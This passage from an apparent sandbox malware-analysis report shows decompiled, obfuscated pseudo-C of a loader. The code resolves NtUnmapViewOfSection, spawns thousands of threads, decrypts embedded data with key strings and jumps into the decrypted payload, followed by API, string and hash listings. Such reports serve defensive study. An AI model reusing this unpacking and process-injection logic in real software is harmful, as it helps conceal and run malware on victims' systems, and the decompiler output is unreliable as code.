																									 *(_t689 + _v136 + 0x1b) = _t485;
																									goto L113;
																								} else {
																									_t76 = _t682 + 0x2a; // 0x2a
																									__eflags = _t685 - _t76;
																									if(_t685 <= _t76) {
																										_t133 = _t682 + 1; // 0x1
																										__eflags = _t685 - _t133;
																										if(__eflags != 0) {
																											_t140 = _t682 + 3; // 0x3
																											__eflags = _t685 - _t140;
																											if(_t685 != _t140) {
																												_t144 = _t682 + 2; // 0x2
																												__eflags = _t685 - _t144;
																												if(__eflags != 0) {
																													_t148 = _t682 + 5; // 0x5
																													__eflags = _t685 - _t148;
																													if(_t685 != _t148) {
																														goto L56;
																													} else {
																														_t587 = _v136 + 0x6a;
																														L113:
																														_t685 = _t685 + _t682;
																														__eflags = _t685;
																														goto L114;
																													}
																												} else {
																													_t587 = _t456 + 0x2d - (_v140 & _v136 + 0x5bf9c9aa) + 0x2d - (_v140 & _v136 + 0x5bf9c9aa) + _v136 + 0x5bf9c9aa;
																													goto L114;
																												}
																											} else {
																												_t465 = _v136 + 0x26bb5918;
																												_t230 = 0x2c - (_v140 & _t465) + 0x2c - (_v140 & _t465) + _t456;
																												L116:
																												_t231 = _t230 + _t465;
																												__eflags = _t231;
																												goto L117;
																											}
																										} else {
																											_t587 = _t456 + 0x2a - (_v140 & _v136 + 0xbc3e77f4) + 0x2a - (_v140 & _v136 + 0xbc3e77f4) + _v136 + 0xbc3e77f4;
																											_t459 = _v136 + ( *(_t689 + _v136 + 0x1b) & 0x000000ff) + _t682 + 1;
																											goto L6;
																										}
																									} else {
																										_t632 = _v136 + 0x87000762;
																										_t525 = 0x29 - (_v140 & _t632) + 0x29 - (_v140 & _t632) + _t456;
																										goto L55;
																									}
																								}
																								goto L126;
																							} else {
																								_t37 = _t682 + 0x40; // 0xe4
																								if(_t685 < _t37) {
																									_t71 = _t459 + 0x59; // 0x59
																									_t674 = _t71;
																									_t525 = _t456 - (_t456 & _t674) + (_t456 & _t674);
																									_t632 = _t674 - 0x6f;
																									__eflags = _t632;
																									L55:
																									_t587 = _t632 + _t525;
																									__eflags = _t587;
																									L56:
																									__eflags = _t682 - 0x200;
																									if(__eflags < 0) {
																										_t509 = _v136;
																										 *(_t689 + _t509 + 0x1b) = _t587;
																										_t459 = _t509 + 1;
																										goto L6;
																									} else {
																										_t459 = _v136;
																										_t262 = _v136 + 0x9b706d16 + _t456 - (_v140 & _v136 + 0x9b706d16) + (_v140 & _v136 + 0x9b706d16) + _v136 + 0x9b706d16 + _t456 - (_v140 & _v136 + 0x9b706d16) + (_v140 & _v136 + 0x9b706d16) - 0x34;
																										goto L109;
																									}
																									L126:
																								} else {
																									_t38 = _t682 + 0x10; // 0xb4
																									_t685 = _t38;
																									_t39 = _t685 + 0x20; // 0xd4
																									_t682 = _t39;
																									_t40 = _t682 + 0x28; // 0xfc
																									if(_t685 > _t40) {
																										_t569 = _t459 + 0x58;
																										_t587 = _t569 + _t456 - 0x68;
																										_t459 = _v136 + ( *(_t689 + _v136 + 0x1b) & 0x000000ff) + _t682 + 1;
																										goto L6;
																									} else {
																										_t41 = _t682 + 0x10; // 0xe4
																										if(_t685 > _t41) {
																											_t63 = _t459 - 0x16; // -22
																											_t470 = _v136;
																											_v140 = _t63 + _t456 - (_t456 & _t63) + (_t456 & _t63) - 0x66;
																											goto L118;
																										} else {
																											_t42 = _t682 + 9; // 0xdd
																											if(_t685 > _t42) {
																												_t61 = _t459 + 0x7c; // 0x7c
																												_t231 = _t61 + _t456 - (_t456 & _t61) + (_t456 & _t61) - 0x64;
																												L117:
																												_v140 = _t231;
																												_t682 = _t682 + 1;
																												_t597 = _t456 - (_t456 & _v136 - 0x0000007d) + (_t456 & _v136 - 0x0000007d) + _v136 - 0x7d + 0x6b;
																												_t469 = _v136;
																												 *(_t689 + _t469 + 0x1b) = _t597;
																												_t470 = _t469 - (_t597 & 0x000000ff) + _t682;
																												__eflags = _t470;
																												_v136 = _t470;
																												L118:
																												_t685 = _t685 + 1;
																												_t239 = _v136;
																												_t587 = _v140;
																												 *((char*)(_t689 + _t239 + 0x1b)) = 0x36;
																												_t459 = _v136 + (_t239 | 0xffffffff) - _t685 + ( *(_t689 + _v136 + (_t239 | 0xffffffff) - _t685 + 0x1b) & 0x000000ff) + _t682 + 1;
																												goto L6;
																											} else {
																												_t43 = _t682 + 6; // 0xda
																												if(_t685 > _t43) {
																													_t576 = _t459 + 0xe;
																													_t587 = _t576 + _t456 - 0x62;
																													L114:
																													_v136 = _v136 + 0xffffffff - (_t587 & 0x000000ff);
																													_t459 = _v136 + 1;
																													goto L6;
																												} else {
																													_t44 = _t682 + 4; // 0xd8
																													if(_t685 > _t44) {
																														_t577 = _t459 - 0x3c;
																														_t436 = _t577 + _t456 - 0x5c;
																														_v140 = _t436;
																														_t587 = _t436;
																														_t459 = _v136 - 1 + 1;
																														goto L6;
																													} else {
																														_t45 = _t682 + 2; // 0xd6
																														if(_t685 > _t45) {
																															_t580 = _t459 + 0x56;
																															_t682 = _t682 + 1;
																															_t442 = _t580 + _t456 - 0x5a;
																															_v140 = _t442;
																															_t587 = _t442;
																															_t459 = _v136 - 1 + 1;
																															goto L6;
																														} else {
																															_t46 = _t682 + 0x2a; // 0xfe
																															if(_t685 > _t46) {
																																_t51 = _t459 - 0x18; // -24
																																_t459 = _v136;
																																_t262 = _t51 + _t456 - (_t456 & _t51) + (_t456 & _t51) - 0x58;
																																L109:
																																_v140 = _t262;
																																_t266 = _v136;
																																 *((char*)(_t689 + _t266 + 0x1b)) = _t459 + 0x5f - (_t459 + 0x0000005f & _t456) + (_t459 + 0x0000005f & _t456) + 0x67 + _t456;
																																_t587 = _v140;
																																_t682 = _t682 + 1;
																																_t459 = _t266 - 1 + 1;
																																goto L6;
																															} else {
																																_t47 = _t682 + 0x5a; // 0x12e
																																_t685 = _t47;
																																_t48 = _t685 + 0x2a; // 0x158
																																_t682 = _t48;
																																continue;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
													goto L125;
												}
												_t262 = 0x37 - (_v140 & _t459 + 0x706a2f5e) + 0x37 - (_v140 & _t459 + 0x706a2f5e) + _t456 + _t459 + 0x706a2f5e;
												_t459 = _v136;
												goto L109;
											}
										}
									}
								}
								L125:
								E00AE30C0(_t456, 0xb37bc8, _t682, _t214);
								GetCurrentProcess(); // executed
								FreeConsole(); // executed
								E00AE1F20(_t456,  &_v120, _t587, _t682, _t685, _t718);
								E00AE2FA0(_t456,  &_v120, _t682, _t460);
								E00AE5F20(_t456, _t682, _t685, _t687);
								__eflags = 0;
								return 0;
								goto L126;
							}
							_t214 = _a14223572;
							_t460 = _a14223576;
							goto L125;
						}
						_t214 = _v129;
						_t460 = _v125;
						goto L125;
					}
				}
			}

0x00ae6710
0x00ae6710
0x00ae6710
0x00ae6710
0x00ae6710
0x00ae6710
0x00ae671b
0x00ae6724
0x00ae6746
0x00ae6726
0x00ae6726
0x00ae672b
0x00ae6736
0x00ae673b
0x00ae673b
0x00ae674c
0x00ae6750
0x00ae6753
0x00ae6754
0x00ae6755
0x00ae6756
0x00ae675e
0x00ae6766
0x00ae676c
0x00ae6770
0x00ae6770
0x00ae6770
0x00ae6776
0x00ae6780
0x00ae6780
0x00ae6782
0x00ae6782
0x00ae6782
0x00ae6789
0x00000000
0x00000000
0x00ae678f
0x00ae6796
0x00ae679a
0x00000000
0x00ae67a0
0x00ae67a8
0x00ae67ad
0x00ae67c8
0x00ae6f72
0x00ae6f72
0x00ae6f81
0x00ae6f8d
0x00000000
0x00ae67ce
0x00ae67ce
0x00ae67d1
0x00ae67d3
0x00ae6ef6
0x00ae6f04
0x00ae6f04
0x00000000
0x00ae67d9
0x00ae67d9
0x00ae67dc
0x00ae67de
0x00ae6eb7
0x00ae6eb7
0x00000000
0x00ae67e4
0x00ae67e4
0x00ae67e4
0x00ae67e7
0x00ae67e9
0x00ae6e93
0x00ae6e95
0x00ae6e9a
0x00ae6e9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00ae67e9
0x00ae67de
0x00ae67d3
0x00ae67af
0x00ae67af
0x00ae67b7
0x00ae67b7
0x00ae67c4
0x00ae67f0
0x00ae67f2
0x00ae6fbf
0x00ae6fc6
0x00ae67f8
0x00ae67f8
0x00ae67fd
0x00ae681b
0x00ae681e
0x00ae6820
0x00ae6e47
0x00ae6e55
0x00ae6e55
0x00000000
0x00ae6826
0x00ae6826
0x00ae6828
0x00ae6e3e
0x00000000
0x00ae682e
0x00ae682e
0x00ae6831
0x00ae6833
0x00ae6e28
0x00000000
0x00ae6839
0x00ae6839
0x00ae683c
0x00ae683e
0x00ae6e08
0x00ae6e14
0x00000000
0x00000000
0x00000000
0x00000000
0x00ae683e
0x00ae6833
0x00ae6828
0x00ae67ff
0x00ae6803
0x00ae6812
0x00ae6816
0x00ae6844
0x00ae6849
0x00ae6b9c
0x00ae6b9f
0x00ae6ba1
0x00ae6bbd
0x00ae6bc0
0x00ae6bc2
0x00ae6bee
0x00ae6bf0
0x00ae6c0e
0x00ae6c11
0x00ae6c13
0x00ae6c31
0x00ae6c34
0x00ae6c36
0x00000000
0x00ae6c3c
0x00ae6c51
0x00000000
0x00ae6c51
0x00ae6c15
0x00ae6c2a
0x00000000
0x00ae6c2a
0x00ae6bf2
0x00ae6c07
0x00000000
0x00ae6c07
0x00ae6bc4
0x00ae6bdd
0x00ae6be8
0x00000000
0x00ae6be8
0x00ae6ba3
0x00ae6bb6
0x00000000
0x00ae6bb6
0x00000000
0x00ae6850
0x00ae6850
0x00ae6850
0x00ae6855
0x00000000
0x00000000
0x00ae685b
0x00ae6860
0x00ae6b65
0x00ae6b6a
0x00ae6b71
0x00ae6b75
0x00ae6b77
0x00000000
0x00ae6866
0x00ae6866
0x00ae686b
0x00ae6b4e
0x00000000
0x00ae6871
0x00ae6871
0x00ae6876
0x00ae6b32
0x00000000
0x00ae687c
0x00ae687c
0x00ae6881
0x00ae6b07
0x00ae6b16
0x00000000
0x00ae6887
0x00ae6887
0x00ae688c
0x00ae6ae3
0x00ae6af2
0x00ae6b01
0x00000000
0x00ae6892
0x00ae6892
0x00ae6897
0x00000000
0x00ae6899
0x00ae6899
0x00ae6899
0x00ae689c
0x00ae689c
0x00ae689f
0x00ae68a4
0x00ae6fa9
0x00ae6fb7
0x00000000
0x00ae68aa
0x00ae68aa
0x00ae68af
0x00ae6f93
0x00ae6fa1
0x00ae6780
0x00000000
0x00ae68b5
0x00ae68b5
0x00ae68bd
0x00ae6935
0x00ae6943
0x00ae6947
0x00000000
0x00ae68bf
0x00ae68bf
0x00ae68c7
0x00ae6a9f
0x00ae6aaf
0x00ae6aaf
0x00ae6ab1
0x00ae6ab1
0x00ae6ab5
0x00ae6ab8
0x00ae6abb
0x00ae6de3
0x00ae6def
0x00000000
0x00ae6ac1
0x00ae6ac1
0x00ae6ac4
0x00ae6ac6
0x00ae6c58
0x00ae6c5b
0x00ae6c5d
0x00ae6c7f
0x00ae6c82
0x00ae6c84
0x00ae6ca7
0x00ae6caa
0x00ae6cac
0x00ae6cc4
0x00ae6cc7
0x00ae6cc9
0x00ae6ce2
0x00ae6ce5
0x00ae6ce7
0x00000000
0x00ae6ced
0x00ae6ced
0x00ae6cfd
0x00ae6d03
0x00000000
0x00ae6d03
0x00ae6ccb
0x00ae6ccb
0x00ae6cdb
0x00000000
0x00ae6cdb
0x00ae6cae
0x00ae6cae
0x00ae6cbc
0x00000000
0x00ae6cbc
0x00ae6c86
0x00ae6c8a
0x00ae6c8a
0x00ae6c99
0x00ae6c9b
0x00ae6c9c
0x00ae6ca0
0x00000000
0x00ae6ca0
0x00ae6c5f
0x00ae6c74
0x00ae6c76
0x00000000
0x00ae6c76
0x00ae6acc
0x00ae6ad0
0x00ae6ad0
0x00ae6adc
0x00ae6ade
0x00000000
0x00ae6ade
0x00ae6ac6
0x00000000
0x00ae68cd
0x00ae68cd
0x00ae68d2
0x00ae6a5f
0x00ae6a5f
0x00ae6a6a
0x00ae6a6c
0x00ae6a6c
0x00ae6a6f
0x00ae6a6f
0x00ae6a6f
0x00ae6a71
0x00ae6a71
0x00ae6a74
0x00ae6dd8
0x00ae6eba
0x00ae6ed2
0x00ae6ed2
0x00ae6ed4
0x00000000
0x00ae6a7a
0x00ae6a7a
0x00ae6a7d
0x00ae6a7f
0x00ae6d0c
0x00ae6d0f
0x00ae6d11
0x00ae6d41
0x00ae6d44
0x00ae6d46
0x00ae6d65
0x00ae6d68
0x00ae6d6a
0x00ae6d8c
0x00ae6d8f
0x00ae6d91
0x00000000
0x00ae6d97
0x00ae6daa
0x00ae6ed8
0x00ae6ed8
0x00ae6ed8
0x00000000
0x00ae6ed8
0x00ae6d6c
0x00ae6d85
0x00000000
0x00ae6d85
0x00ae6d48
0x00ae6d50
0x00ae6d5e
0x00ae6f06
0x00ae6f06
0x00ae6f06
0x00000000
0x00ae6f06
0x00ae6d13
0x00ae6d2c
0x00ae6d3b
0x00000000
0x00ae6d3b
0x00ae6a85
0x00ae6a8f
0x00ae6a9b
0x00000000
0x00ae6a9b
0x00ae6a7f
0x00000000
0x00ae68d8
0x00ae68d8
0x00ae68dd
0x00ae6a1d
0x00ae6a1d
0x00ae6a28
0x00ae6a2a
0x00ae6a2a
0x00ae6a2d
0x00ae6a2d
0x00ae6a2d
0x00ae6a2f
0x00ae6a2f
0x00ae6a35
0x00ae6db1
0x00ae6db5
0x00ae6db9
0x00000000
0x00ae6a3b
0x00ae6a52
0x00ae6a58
0x00000000
0x00ae6a58
0x00000000
0x00ae68e3
0x00ae68e3
0x00ae68e3
0x00ae68e6
0x00ae68e6
0x00ae68e9
0x00ae68ee
0x00ae69f9
0x00ae6a0b
0x00ae6a17
0x00000000
0x00ae68f4
0x00ae68f4
0x00ae68f9
0x00ae69da
0x00ae69ea
0x00ae69f0
0x00000000
0x00ae68ff
0x00ae68ff
0x00ae6904
0x00ae69c3
0x00ae69d3
0x00ae6f08
0x00ae6f08
0x00ae6f19
0x00ae6f21
0x00ae6f23
0x00ae6f2c
0x00ae6f30
0x00ae6f30
0x00ae6f32
0x00ae6f36
0x00ae6f41
0x00ae6f42
0x00ae6f4c
0x00ae6f50
0x00ae6f68
0x00000000
0x00ae690a
0x00ae690a
0x00ae690f
0x00ae69ad
0x00ae69bb
0x00ae6eda
0x00ae6ee4
0x00ae6eec
0x00000000
0x00ae6915
0x00ae6915
0x00ae691a
0x00ae698c
0x00ae699e
0x00ae69a1
0x00ae69a5
0x00ae69a7
0x00000000
0x00ae691c
0x00ae691c
0x00ae6921
0x00ae696a
0x00ae6971
0x00ae697d
0x00ae6980
0x00ae6984
0x00ae6986
0x00000000
0x00ae6923
0x00ae6923
0x00ae6928
0x00ae694f
0x00ae695f
0x00ae6963
0x00ae6e57
0x00ae6e57
0x00ae6e66
0x00ae6e6f
0x00ae6e73
0x00ae6e7a
0x00ae6e7b
0x00000000
0x00ae692a
0x00ae692a
0x00ae692a
0x00ae692d
0x00ae692d
0x00000000
0x00ae692d
0x00ae6928
0x00ae6921
0x00ae691a
0x00ae690f
0x00ae6904
0x00ae68f9
0x00ae68ee
0x00ae68dd
0x00ae68d2
0x00ae68c7
0x00ae68bd
0x00ae68af
0x00ae68a4
0x00ae6897
0x00ae688c
0x00ae6881
0x00ae6876
0x00ae686b
0x00000000
0x00ae6860
0x00ae6b91
0x00ae6b93
0x00000000
0x00ae6b93
0x00ae6849
0x00ae67fd
0x00ae67f2
0x00ae6fe7
0x00ae6fee
0x00ae6ff3
0x00ae6ff9
0x00ae7003
0x00ae700c
0x00ae7011
0x00ae7019
0x00ae7022
0x00000000
0x00ae7022
0x00ae6fcf
0x00ae6fd6
0x00000000
0x00ae6fd6
0x00ae6fdf
0x00ae6fe3
0x00000000
0x00ae6fe3
0x00ae6780

APIs

GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00AE671B
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00AE6746
GetCurrentProcess.KERNEL32 ref: 00AE6FF3
FreeConsole.KERNEL32 ref: 00AE6FF9

Part of subcall function 00AE5F20: CreateThread.KERNELBASE ref: 00AE5F3F
Part of subcall function 00AE5F20: GetCurrentProcess.KERNEL32 ref: 00AE5F46
Part of subcall function 00AE5F20: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00AE606E

Strings

NtUnmapViewOfSection, xrefs: 00AE6740
Could not get a handle to ntdll.dll., xrefs: 00AE6726
ntdll.dll, xrefs: 00AE6716

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: CurrentProcess$AddressByteCharConsoleCreateFreeHandleModuleMultiProcThreadWide
String ID: Could not get a handle to ntdll.dll.$NtUnmapViewOfSection$ntdll.dll
API String ID: 3576439103-652429421
Opcode ID: 8f7f0cb24d5c187d54d7edaf83cb29c275e2adfc2328c5f3913c40948b859f17
Instruction ID: 39b205cdf91e224a9500f2e26b01e16cee0629b7d011eb05fca4d82cf8c47a10
Opcode Fuzzy Hash: 8f7f0cb24d5c187d54d7edaf83cb29c275e2adfc2328c5f3913c40948b859f17
Instruction Fuzzy Hash: 2642C6365042428FCB14CF25D0E15EAB7F2EFA2389F504E5CD4A19B642E335E91FAB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AE5F20 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 194
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00AE5F20(void* __ebx, void* __edi, void* __esi, void* __ebp) {
				char _v65;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v100;
				signed int _v104;
				int _v108;
				signed int _v112;
				int _v116;
				void* _v117;
				int _v124;
				intOrPtr _v128;
				signed int _v132;
				signed int* _t52;
				signed int _t53;
				int _t59;
				signed int _t67;
				int _t68;
				signed int _t77;
				signed int* _t84;
				int _t90;
				signed int _t91;
				signed int* _t92;
				signed int* _t93;
				signed int _t94;
				intOrPtr _t95;
				void* _t96;
				void* _t98;
				signed int* _t101;
				int _t103;
				void* _t104;
				void* _t106;
				char _t107;
				int _t108;
				void* _t113;
				void* _t114;
				void* _t117;
				void* _t118;

				_t112 = __ebp;
				_t81 = __ebx;
				_t114 = _t113 - 0x74;
				_push(__edi);
				_t106 = 0x5bf5;
				do {
					CreateThread(0, 0, E00AE36A0, 0, 0, 0); // executed
					_t106 = _t106 - 1;
				} while (_t106 != 0);
				GetCurrentProcess();
				_t52 = E00AE3440( &_v65);
				_t107 = 0x3b;
				_t3 =  &(_t52[0]); // 0x1
				_t101 = _t3;
				_t92 = _t101;
				do {
					_t92 =  &(_t92[0]);
					 *(_t92 - 1) =  *(_t92 - 1) ^  *_t52;
					_t107 = _t107 - 1;
				} while (_t107 != 0);
				_t84 = _t101;
				_t52[0xf] = 0;
				_v92 = _t107;
				_v76 = _t107;
				_v72 = 0xf;
				_t11 =  &(_t84[0]); // 0x2
				_t93 = _t11;
				asm("o16 nop [eax+eax]");
				do {
					_t53 =  *_t84;
					_t84 =  &(_t84[0]);
					_t122 = _t53;
				} while (_t53 != 0);
				_push(_t84 - _t93);
				_push(_t101);
				E00AE4660( &_v92, _t93);
				_push(0x4f8d53);
				_push(0);
				_push(0x9da0d);
				_push(0x5a);
				_push(0x9fd3e);
				_push(0x4afc);
				_push(0);
				_push(0x8f7a6);
				_push(0x4e72fa);
				_push(0x74d85d);
				_push(0);
				_push(0xfe61);
				_push(0x12342);
				_push(0xb8bac);
				asm("xorps xmm0, xmm0");
				asm("movsd [esp], xmm0");
				asm("movsd xmm0, [0xb06358]");
				asm("movsd [esp], xmm0");
				E00AE36C0(__ebx, _t93, _t101, _t107, __ebp, _t122,  &E00B14000, 0x77e, 0x299, 0x30d, 0, 0x21e4, 0, 0x283, 0, 0xcd, 0x7742);
				E00AE3640("juL3HXotOjGDez6xcVpB68Jl6CZGpVvV8Jhs3on4DwD5kQrl9MkeYg9u6p5cYtlQ9dYOH8hfsvYVsgKCBsqBVyqCJg",  &E00B14000, 0x77e, 0x5b);
				_t117 = _t114 + 0x84;
				_t103 = _v84 + 1;
				_t58 =  >=  ? _v100 :  &_v100;
				_t59 = MultiByteToWideChar(0xfde9, 0,  >=  ? _v100 :  &_v100, _t103, 0, 0);
				_t108 = _t59;
				_v124 = 0;
				_v108 = 0;
				_v104 = 7;
				if(_t108 != 0) {
					_push(0);
					_push(_t108);
					E00AE44C0( &_v124);
				} else {
					_v108 = _t108;
					 *(_t117 + 0xc + _t108 * 2) = _t59;
				}
				_t89 =  >=  ? _v132 :  &_v132;
				_t62 =  >=  ? _v108 :  &_v108;
				MultiByteToWideChar(0xfde9, 0,  >=  ? _v108 :  &_v108, _t103,  >=  ? _v132 :  &_v132, _t108);
				_t110 =  >=  ? _v132 :  &_v132;
				E00AE3640("WjylxVeF4cWs8QLZ3Lkpssk7r8b6ldTpwpvAFwM7uve7xmjncn4HnSGKYW1EiBage9sgzPxi3TSGmfNYhqUVEqckIW", 0xb14780, 0x22400, 0x5b);
				_push(0x554322);
				_push(0x41243);
				_push(0xb14780);
				_push(0);
				_push( >=  ? _v132 :  &_v132);
				E00B14181(); // executed
				_t94 = _v112;
				_t118 = _t117 + 0x24;
				_pop(_t104);
				if(_t94 < 8) {
					L13:
					_t95 = _v88;
					_t67 = 0;
					_v116 = 0;
					_v112 = 7;
					_v132 = 0;
					if(_t95 < 0x10) {
						L17:
						return _t67;
					} else {
						_t90 = _v108;
						_t96 = _t95 + 1;
						_t68 = _t90;
						if(_t96 < 0x1000) {
							L16:
							_push(_t96);
							_t67 = E00AE906D(_t90);
							_t118 = _t118 + 8;
							goto L17;
						} else {
							_t90 =  *(_t90 - 4);
							_t96 = _t96 + 0x23;
							if(_t68 - _t90 + 0xfffffffc > 0x1f) {
								goto L18;
							} else {
								goto L16;
							}
						}
					}
				} else {
					_t91 = _v132;
					_t98 = 2 + _t94 * 2;
					_t77 = _t91;
					if(_t98 < 0x1000) {
						L12:
						_push(_t98);
						E00AE906D(_t91); // executed
						_t118 = _t118 + 8;
						goto L13;
					} else {
						_t90 =  *(_t91 - 4);
						_t96 = _t98 + 0x23;
						if(_t77 - _t90 + 0xfffffffc > 0x1f) {
							L18:
							E00AED24F(_t81, _t90, _t96, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							__eflags =  *((intOrPtr*)(_t90 + 0x38));
							_t73 =  !=  ? 0 : 4;
							_t74 = ( !=  ? 0 : 4) |  *(_t90 + 0xc);
							_t75 = ( !=  ? 0 : 4) |  *(_t90 + 0xc) | _v132;
							__eflags = 4;
							return E00AE4840(_t81, _t90, _t104, _t112, ( !=  ? 0 : 4) |  *(_t90 + 0xc) | _v132, _v128);
						} else {
							goto L12;
						}
					}
				}
			}

0x00ae5f20
0x00ae5f20
0x00ae5f20
0x00ae5f24
0x00ae5f2b
0x00ae5f30
0x00ae5f3f
0x00ae5f41
0x00ae5f41
0x00ae5f46
0x00ae5f55
0x00ae5f5a
0x00ae5f5f
0x00ae5f5f
0x00ae5f62
0x00ae5f64
0x00ae5f66
0x00ae5f69
0x00ae5f6c
0x00ae5f6c
0x00ae5f71
0x00ae5f73
0x00ae5f77
0x00ae5f7b
0x00ae5f7f
0x00ae5f87
0x00ae5f87
0x00ae5f8a
0x00ae5f90
0x00ae5f90
0x00ae5f92
0x00ae5f93
0x00ae5f93
0x00ae5f99
0x00ae5f9a
0x00ae5f9f
0x00ae5fa4
0x00ae5fa9
0x00ae5fab
0x00ae5fb0
0x00ae5fb2
0x00ae5fb7
0x00ae5fbc
0x00ae5fbe
0x00ae5fc3
0x00ae5fc8
0x00ae5fcd
0x00ae5fcf
0x00ae5fd4
0x00ae5fd9
0x00ae5fe1
0x00ae5fe4
0x00ae5fe9
0x00ae6013
0x00ae6027
0x00ae603d
0x00ae6050
0x00ae6056
0x00ae605c
0x00ae606e
0x00ae6074
0x00ae6076
0x00ae607e
0x00ae6086
0x00ae6090
0x00ae609d
0x00ae609f
0x00ae60a4
0x00ae6092
0x00ae6092
0x00ae6096
0x00ae6096
0x00ae60b3
0x00ae60c2
0x00ae60d0
0x00ae60e1
0x00ae60f5
0x00ae60fa
0x00ae60ff
0x00ae6104
0x00ae6109
0x00ae610b
0x00ae6111
0x00ae6113
0x00ae6117
0x00ae611a
0x00ae611f
0x00ae6150
0x00ae6150
0x00ae6154
0x00ae6156
0x00ae615e
0x00ae6166
0x00ae616e
0x00ae6199
0x00ae619c
0x00ae6170
0x00ae6170
0x00ae6174
0x00ae6175
0x00ae617d
0x00ae618f
0x00ae618f
0x00ae6191
0x00ae6196
0x00000000
0x00ae617f
0x00ae617f
0x00ae6182
0x00ae618d
0x00000000
0x00000000
0x00000000
0x00000000
0x00ae618d
0x00ae617d
0x00ae6121
0x00ae6121
0x00ae6125
0x00ae612c
0x00ae6134
0x00ae6146
0x00ae6146
0x00ae6148
0x00ae614d
0x00000000
0x00ae6136
0x00ae6136
0x00ae6139
0x00ae6144
0x00ae619d
0x00ae619d
0x00ae61a2
0x00ae61a3
0x00ae61a4
0x00ae61a5
0x00ae61a6
0x00ae61a7
0x00ae61a8
0x00ae61a9
0x00ae61aa
0x00ae61ab
0x00ae61ac
0x00ae61ad
0x00ae61ae
0x00ae61af
0x00ae61bb
0x00ae61be
0x00ae61c1
0x00ae61c4
0x00ae61c4
0x00ae61ce
0x00000000
0x00000000
0x00000000
0x00ae6144
0x00ae6134

APIs

CreateThread.KERNELBASE ref: 00AE5F3F
GetCurrentProcess.KERNEL32 ref: 00AE5F46
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00AE606E
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000000,00000000,00000000), ref: 00AE60D0

Part of subcall function 00AE3640: GetCurrentProcess.KERNEL32(?,?,00000001,0000003A,00AE6042,juL3HXotOjGDez6xcVpB68Jl6CZGpVvV8Jhs3on4DwD5kQrl9MkeYg9u6p5cYtlQ9dYOH8hfsvYVsgKCBsqBVyqCJg,Function_00034000,0000077E,0000005B,Function_00034000,0000077E,00000299,000000CD,00007742,?), ref: 00AE3656

Strings

juL3HXotOjGDez6xcVpB68Jl6CZGpVvV8Jhs3on4DwD5kQrl9MkeYg9u6p5cYtlQ9dYOH8hfsvYVsgKCBsqBVyqCJg, xrefs: 00AE6038
WjylxVeF4cWs8QLZ3Lkpssk7r8b6ldTpwpvAFwM7uve7xmjncn4HnSGKYW1EiBage9sgzPxi3TSGmfNYhqUVEqckIW, xrefs: 00AE60F0

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ByteCharCurrentMultiProcessWide$CreateThread
String ID: WjylxVeF4cWs8QLZ3Lkpssk7r8b6ldTpwpvAFwM7uve7xmjncn4HnSGKYW1EiBage9sgzPxi3TSGmfNYhqUVEqckIW$juL3HXotOjGDez6xcVpB68Jl6CZGpVvV8Jhs3on4DwD5kQrl9MkeYg9u6p5cYtlQ9dYOH8hfsvYVsgKCBsqBVyqCJg
API String ID: 2784346141-1341479164
Opcode ID: 8d219bcc69a86344c90df5e9e26cce53bdde93661219a2817d4b6305859af502
Instruction ID: 19a7a6690192547a2d43513b6e47a61ecdc85428264d7eae2b03e0671e0f985a
Opcode Fuzzy Hash: 8d219bcc69a86344c90df5e9e26cce53bdde93661219a2817d4b6305859af502
Instruction Fuzzy Hash: 61512331748381BBE710DF25CD46F1BB7E5AF95B04F508A1CF284AB1D1D7B0AA448B86

Uniqueness

Uniqueness Score: -1.00%

Function 00AF4840 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00AF4840(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t30;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
